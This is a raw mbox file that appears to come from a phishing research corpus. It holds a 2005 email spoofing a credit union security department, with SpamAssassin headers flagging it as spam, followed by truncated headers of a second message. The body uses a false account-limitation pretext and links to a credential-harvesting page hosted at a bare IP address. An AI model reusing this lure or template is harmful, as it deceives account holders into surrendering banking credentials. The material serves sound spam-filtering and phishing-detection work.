From: "Credit Union Security Department" <anti-fraud@ncua.gov>
Reply-To: "Credit Union Security Department" <report@ncua.gov>
To: remi@uninet.edu, josu@uninet.edu, pask@uninet.edu
Subject: [*** POSIBLE SPAM***] Update Your CU Account Profile
Date: Tue, 25 Oct 2005 17:32:44 +0200
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--1964094918274964"
X-Priority: 1
X-MSMail-Priority: High
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at localhost
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at uninet.edu
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *************
X-Spam-Status: Yes, score=13.7 required=5.0 tests=HTML_10_20,HTML_MESSAGE,
	MIME_BOUND_DD_DIGITS,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
	MISSING_MIMEOLE,MPART_ALT_DIFF,MSGID_SPAM_CAPS,NORMAL_HTTP_TO_IP,
	RATWARE_EGROUPS autolearn=spam version=3.0.2
X-Spam-Report: 
	*  4.1 MIME_BOUND_DD_DIGITS Spam tool pattern in MIME boundary
	*  2.8 RATWARE_EGROUPS Bulk email fingerprint (eGroups) found
	*  3.8 MSGID_SPAM_CAPS Spam tool Message-Id: (caps variant)
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 HTML_10_20 BODY: Message is 10% to 20% HTML
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
	*  0.0 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE
Status: O
X-Status: 
X-Keywords:                  
X-UID: 397

----1964094918274964
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

 <html>
 <head>
 </head>
 <body>
 Credit Union is constantly working to ensure security by regularly <br>
screening the accounts in our system. We recently reviewed your account, <=
br>
and we need more information to help us provide you with secure service. <=
br>
Until we can collect this information, your access to sensitive account <b=
r>
features will be limited. We would like to restore your access as soon <br=
>
as possible, and we apologize for the inconvenience. <br>
<hr>
<br>
Why is my account access limited? <br>
<br>
Your account access has been limited for the following reason(s): <br>
* We would like to ensure that your account was not accessed by an <br>
unauthorized third party. Because protecting the security of your <br>
account is our primary concern, we have limited access to sensitive <br>
Credit Union account features. We understand that this may be an <br>
inconvenience but please understand that this temporary limitation is <br>=

for your protection. <br>
<br>
(Your case ID for this reason is PCU1-410-320-3334.) <br>
<br>
<br>
At Credit Union, one of our most important responsibilities to you, our <b=
r>
customer, is the safekeeping of the nonpublic personal ("confidential") <b=
r>
information you have entrusted to us and using this information in a <br>
responsible manner. Appropriate use of the confidential information you <b=
r>
provide us is also at the heart of our ability to provide you with <br>
exceptional personal service whenever you contact us. <br>
<hr>
<br>
How can I restore my account access? <br>
<br>
<br>
Please confirm your identity here: Restore
<a href=3D"http://221.134.9.147/.CREDIT-UNION/update_card.htm">My
Online Banking</a> and complete the "Steps to Remove Limitations." <br>
<br>
Completing all of the checklist items will automatically restore your <br>=

account access. <br>
</body>
</html>

----1964094918274964--

From verify@ncua.gov  Tue Oct 25 11:34:08 2005
Return-Path: <verify@ncua.gov>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 5CAB0536E94
	for <jose@login.monkey.org>; Tue, 25 Oct 2005 11:34:08 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id AEC456FA3A5
	for <jose@monkey.org>; Tue, 25 Oct 2005 11:34:06 -0400 (EDT)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 25 Oct 2005 11:34:06 -0400 (EDT)
Received: by lujan.uninet.edu (Postfix)
	id 4163F1BB51; Tue, 25 Oct 2005 17:33:38 +0200 (CEST)
Delivered-To: josu@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 62BEB1BB50; Tue, 25 Oct 2005 15:33:37 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 00263-06; Tue, 25 Oct 2005 17:33:25 +0200 (CEST)
Received: from rocinante.compendium.com.ar (unknown [200.69.230.11])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 924B61BB12; Tue, 25 Oct 2005 17:33:18 +0200 (CEST)
Received: from localhost (rocinante [127.0.0.1])
	by rocinante.compendium.com.ar (Postfix) with ESMTP id DA5C250003D;
	Tue, 25 Oct 2005 12:33:11 -0300 (ART)
Received: from rocinante.compendium.com.ar ([127.0.0.1])
	by localhost (rocinante [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 15262-09; Tue, 25 Oct 2005 12:33:07 -0300 (ART)
Received: from 72.22.64.184 (unknown [72.22.64.184])
	by rocinante.compendium.com.ar (Postfix) with SMTP id 54C8F500076;
	Tue, 25 Oct 2005 12:33:05 -0300 (ART)
Received: from 125.240.167.104 by ; Tue, 25 Oct 2005 10:26:06 -0600
Message-ID: <IFLJTJUPFCDUBYSBOJNV@charter.net>
